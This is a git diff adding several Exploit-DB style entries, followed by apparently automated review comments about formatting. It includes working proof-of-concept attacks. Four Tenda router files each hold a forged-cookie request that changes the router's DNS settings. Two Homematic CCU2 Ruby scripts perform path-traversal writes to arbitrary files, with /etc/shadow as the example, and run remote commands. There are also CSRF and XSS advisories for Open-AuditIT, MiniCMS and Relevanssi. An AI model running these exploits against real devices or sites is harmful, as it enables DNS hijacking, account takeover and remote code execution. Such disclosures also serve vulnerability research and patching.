diff --git a/exploits/asp/webapps/44373.txt b/exploits/asp/webapps/44373.txt new file mode 100644 index 000000000..af0e89aaf --- /dev/null +++ b/exploits/asp/webapps/44373.txt 
@@ -0,0 +1,63 @@ +# +# +# Tenda W308R v2 Wireless Router V5.07.48 +# Cookie Session Weakness Remote DNS Change PoC +# +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! 
+# +# + + +GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null \ No newline at end of file diff --git a/exploits/asp/webapps/44377.txt b/exploits/asp/webapps/44377.txt new file mode 100644 index 000000000..da03ed75f --- /dev/null +++ b/exploits/asp/webapps/44377.txt 
@@ -0,0 +1,63 @@ +# +# +# Tenda W316R Wireless Router V5.07.50 +# Cookie Session Weakness Remote DNS Change PoC +# +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! 
+# +# + + +GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null \ No newline at end of file diff --git a/exploits/asp/webapps/44380.txt b/exploits/asp/webapps/44380.txt new file mode 100644 index 000000000..555797776 --- /dev/null +++ b/exploits/asp/webapps/44380.txt 
@@ -0,0 +1,62 @@ +# +# +# Tenda W3002R/A302/w309r Wireless Router V5.07.64_en +# Cookie Session Weakness Remote DNS Change PoC +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! 
+# +# + + +GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null \ No newline at end of file diff --git a/exploits/asp/webapps/44381.txt b/exploits/asp/webapps/44381.txt new file mode 100644 index 000000000..afdd8d0d4 --- /dev/null +++ b/exploits/asp/webapps/44381.txt 
@@ -0,0 +1,62 @@ +# +# +# Tenda FH303/A300 Firmware V5.07.68_EN +# Cookie Session Weakness Remote DNS Change PoC +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# +# Once modified, systems use foreign DNS servers, which are +# usually set up by cybercriminals. Users with vulnerable +# systems or devices who try to access certain sites are +# instead redirected to possibly malicious sites. +# +# Modifying systems' DNS settings allows cybercriminals to +# perform malicious activities like: +# +# o Steering unknowing users to bad sites: +# These sites can be phishing pages that +# spoof well-known sites in order to +# trick users into handing out sensitive +# information. +# +# o Replacing ads on legitimate sites: +# Visiting certain sites can serve users +# with infected systems a different set +# of ads from those whose systems are +# not infected. +# +# o Controlling and redirecting network traffic: +# Users of infected systems may not be granted +# access to download important OS and software +# updates from vendors like Microsoft and from +# their respective security vendors. +# +# o Pushing additional malware: +# Infected systems are more prone to other +# malware infections (e.g., FAKEAV infection). +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! 
+# +# + + +GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null \ No newline at end of file diff --git a/exploits/cgi/webapps/44361.rb b/exploits/cgi/webapps/44361.rb new file mode 100755 index 000000000..f38e0c139 --- /dev/null +++ b/exploits/cgi/webapps/44361.rb 
@@ -0,0 +1,81 @@ +#!/usr/bin/ruby + +# Exploit Title: Homematic CCU2 Arbitrary File Write +# Date: 28-03-18 +# Exploit Author: Patrick Muench, Gregor Kopf +# Vendor Homepage: http://www.eq-3.de +# Software Link: http://www.eq-3.de/service/downloads.html?id=268 +# Version: 2.29.23 +# CVE : 2018-7300 + +# Description: http://atomic111.github.io/article/homematic-ccu2-filewrite + +require 'net/http' +require 'net/https' +require 'uri' +require 'json' + +unless ARGV.length == 3 + STDOUT.puts <<-EOF +Please provide url + +Usage: + write_files.rb + +Example: + write_files.rb https://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::' + + or + + write_files.rb http://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::' + +EOF + exit +end + +# The first argument specifiee the URL and if http or https is used +url = ARGV[0] + "/api/homematic.cgi" + +# The second argument specifies the file into which the content should be written +homematic_file_path = ARGV[1] + +# The third argument specifies the content of the file +homematic_file_content = ARGV[2] + +# define the json body for the attack +body = { + "version": "1.1", + "method": "User.setLanguage", + "params": { + "userName": "file path", + "userLang": "file content" + } + }.to_hash + +# define the traversal with the file you want to write +body[:params][:userName] = "../../../../../../../.." 
+ homematic_file_path + "\u0000" + +# define the content +body[:params][:userLang] = homematic_file_content + +# split the uri to access it in a easier way +uri = URI.parse(url) + +# define target connection, disabling certificate verification +Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http| + + # define post request + request = Net::HTTP::Post.new(uri.request_uri) + + # define the content type of the http request + request.content_type = 'application/json' + + # define the request body + request.body = body.to_json + + # send the request to the homematic ccu2 + response = http.request(request) + + # print response message code and status to cli + puts 'Response code: ' + response.code + ' ' + response.message +end \ No newline at end of file diff --git a/exploits/cgi/webapps/44368.rb b/exploits/cgi/webapps/44368.rb new file mode 100755 index 000000000..60e8d255b --- /dev/null +++ b/exploits/cgi/webapps/44368.rb 
@@ -0,0 +1,61 @@ +#!/usr/bin/ruby + +# Exploit Title: Homematic CCU2 Remote Command Execution +# Date: 28-03-18 +# Exploit Author: Patrick Muench, Gregor Kopf +# Vendor Homepage: http://www.eq-3.de +# Software Link: http://www.eq-3.de/service/downloads.html?id=268 +# Version: 2.29.23 +# CVE : 2018-7297 + +# Description: http://atomic111.github.io/article/homematic-ccu2-remote-code-execution + +require 'net/http' +require 'net/https' +require 'uri' + +unless ARGV.length == 2 + STDOUT.puts <<-EOF +Please provide url and the command, which is execute on the homematic + +Usage: + execute_cmd.rb + +Example: + execute_cmd.rb https://192.168.1.1 "cat /etc/shadow" + + or + + execute_cmd.rb http://192.168.1.1 "cat /etc/shadow" + +EOF + exit +end + +# The first argument specifies the URL and if http or https is used +url = ARGV[0] + "/Test.exe" + +# The second argument specifies the command which is executed via tcl interpreter +tcl_command = ARGV[1] + +# define body content +body = "string stdout;string stderr;system.Exec(\"" << tcl_command << "\", &stdout, &stderr);WriteLine(stdout);" + +# split uri to access it in a easier way +uri = URI.parse(url) + +# define target connection, disabling certificate verification +Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http| + + # define post request + request = Net::HTTP::Post.new(uri.request_uri) + + # define the request body + request.body = body + + # send the request to the homematic ccu2 + response = http.request(request) + + # print response to cli + puts response.body +end \ No newline at end of file diff --git a/exploits/multiple/webapps/44360.txt b/exploits/multiple/webapps/44360.txt new file mode 100644 index 000000000..5a794f6ee --- /dev/null +++ b/exploits/multiple/webapps/44360.txt 
@@ -0,0 +1,69 @@ +# Exploit Title: Open-AuditIT Professional 2.1 - Cross-Site Request Forgery (CSRF) +# Date: 27-03-2018 +# Exploit Author: Nilesh Sapariya +# Contact: https://twitter.com/nilesh_loganx +# Website: https://nileshsapariya.blogspot.com +# Vendor Homepage: https://www.open-audit.org/ +# Software Link : https://www.open-audit.org/downloads.php +# Version: 2.1 +# CVE : CVE-2018-8979 +# Tested on: Windows 10 Pro +# Category: Webapp Open-AuditIT Professional 2.1 + + +1. Description:- +There is no CSRF protection in Open-AuditIT application, with a little help +of social engineering (like sending a link via email/chat) an attacker may +force the victim to click on a malicious link by which any normal user can +become an Admin user. The attack can force an end user to execute unwanted +actions on a web application in which they're currently authenticated. +Using this vulnerability, we were able to compromise entire user account +with chaining this bug with XSS. + + + +2. Proof of Concept +Login into Open-AuditIT Professional 2.1 +Step 1 :- Craft a HTML Page with XSS payload +Step 2:- Save this .html file and send it to victim (Victim should be +loggedin in the browser) +Crafted value will be added. + + +Affected Code: + + + +
+ + + + + + + + + +
+ + + + +​​3] POCs and steps: +https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html + + +Thanks & Regards, +Nilesh Sapariya +Security Researcher +https://twitter.com/nilesh_loganx +*https://nileshsapariya.blogspot.in \ No newline at end of file diff --git a/exploits/php/webapps/44362.html b/exploits/php/webapps/44362.html new file mode 100644 index 000000000..227fdba23 --- /dev/null +++ b/exploits/php/webapps/44362.html @@ -0,0 +1,36 @@ +<-- +# Exploit Title: MiniCMS 1.10 CSRF Vulnerability +# Date: 2018-03-28 +# Exploit Author: zixian(me@zixian.org、zixian@5ecurity.cn) +# Vendor Homepage: https://github.com/bg5sbk/MiniCMS +# Software Link: https://github.com/bg5sbk/MiniCMS +# Version: 1.10 +# CVE : CVE-2018-9092 + + + +There is a CSRF vulnerability that can change the administrator account password +After the administrator logged in, open the following page + poc: +--> + + + + test + +
+ + + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/44366.txt b/exploits/php/webapps/44366.txt new file mode 100644 index 000000000..5d8052c6f --- /dev/null +++ b/exploits/php/webapps/44366.txt @@ -0,0 +1,46 @@ +# Exploit Title : Relevanssi Wordpress Search Plugin Reflected Cross Site Scripting (XSS) +# Date: 23-03-2018 +# Exploit Author : Stefan Broeder +# Contact : https://twitter.com/stefanbroeder +# Vendor Homepage: https://www.relevanssi.com +# Software Link: https://wordpress.org/plugins/relevanssi +# Version: 4.0.4 +# CVE : CVE-2018-9034 +# Category : webapps + +Description +=========== +Relevanssi is a WordPress plugin with more than 100.000 active installations. Version 4.0.4 (and possibly previous versions) are affected by a Reflected XSS vulnerability. + +Vulnerable part of code +======================= +File: relevanssi/lib/interface.php:1055 displays unescaped value of $_GET variable 'tab'. + +.. +1049 if( isset( $_REQUEST[ 'tab' ] ) ) { +1050 $active_tab = $_REQUEST[ 'tab' ]; +1051 } // end if +1052 +1053 if ($active_tab === "stopwords") $display_save_button = false; +1054 +1055 echo ""; +.. + +Impact +====== +Arbitrary JavaScript code can be run on browser side if a logged in WordPress administrator is tricked to click on a link or browse a URL under the attacker control. +This can potentially lead to creation of new admin users, or remote code execution on the server. + +Proof of Concept +============ +In order to exploit this vulnerability, the attacker needs to have the victim visit the following link: + +/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab='>
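Review bot: the four Tenda files in this patch (44373, 44377, 44380, 44381) are the same file apart from the model/firmware line, and their 50-line header explains the generic consequences of DNS hijacking at length while never stating the actual weakness being reported, which is the one sentence a vendor or defender needs. Add a line to each header saying what about the cookie check on the `/goform/AdvSetDns` handler is insufficient, plus a CVE or vendor advisory reference and the firmware version (if any) that fixes it, and consider cross-referencing the sibling files instead of repeating the boilerplate. Minor: the request line ends in `2>/dev/null`, which hides every error from the `GET` client (lwp-request), so a failed request is indistinguishable from a successful one; drop the redirect or check the exit status.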
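Review bot: the usage message in 44361.rb shows `write_files.rb` with no argument placeholders, yet the guard above it requires exactly three positional arguments; name them in the usage text (the comments further down already describe them as URL, file path and file content) so the check and the help agree, and print the message to `STDERR` with `exit 1` rather than `STDOUT` and a bare `exit`, which returns 0 and makes the usage error look like success to a calling script. Also: the `.to_hash` call on the `body` hash literal is a no-op and can go; `# The first argument specifiee the URL` has a typo; and the header writes the identifier as `CVE : 2018-7300` without the `CVE-` prefix, unlike 44360's `CVE : CVE-2018-8979`, which breaks searching the repository by CVE id.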
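Review bot: 44368.rb prints `response.body` without looking at `response.code`, so an error page or redirect body is shown as if it were the result of the request; check for a 2xx status first and report the status otherwise (44361.rb in the same patch already prints `response.code` and `response.message`). The same points as its sibling apply: the usage text has no argument placeholders after `execute_cmd.rb`, the argument-error path exits with status 0 on `STDOUT`, the header's `CVE : 2018-7297` lacks the `CVE-` prefix, and the sentence `Please provide url and the command, which is execute on the homematic` should read "which is executed on the Homematic".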
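Review bot: the `Affected Code:` heading in 44360.txt is followed by nothing, and the PoC steps (`Craft a HTML Page with XSS payload`, `Crafted value will be added`) refer to an HTML page and a value that are not in the file; either include the code the heading promises or remove the heading and point to the linked blog post for both. The description says `any normal user can become an Admin user` while step 2 only requires the victim to be logged in, so state which role the victim must hold for the forged request to succeed. The section numbering also jumps from `1. Description` and `2. Proof of Concept` to `3] POCs and steps`, the `Thanks & Regards` signature with a stray `*` before the last URL is e-mail residue that does not belong in an advisory, and `Category: Webapp Open-AuditIT Professional 2.1` repeats the title where the other entries simply put `webapps`.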
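Review bot: the header block in 44362.html opens with `<--` instead of `<!--`, so a browser will not treat it as a comment; the exploit title, author line and description would be rendered as page text above the form, and the closing `-->` then matches nothing. Change the opener to `<!--`. Also fix `After the administrator logged in, open the following page` to "After the administrator has logged in, open the following page" and give the header the same `# Tested on:` line the other entries carry.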
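Review bot: the `Vulnerable part of code` section in 44366.txt says line 1055 displays the unescaped `$_GET` variable `tab`, but the quoted code reads `$active_tab = $_REQUEST[ 'tab' ];`, so the value can also arrive via POST or a cookie; say `$_REQUEST` in the description, since the difference matters to anyone writing a detection rule or reviewing the fix. Also `100.000 active installations` should be `100,000` in an English-language advisory, the `Proof of Concept` underline is shorter than its heading while the other headings match, and the header names 4.0.4 as affected without saying which release fixes the issue; add the fixed version so readers can check their installations.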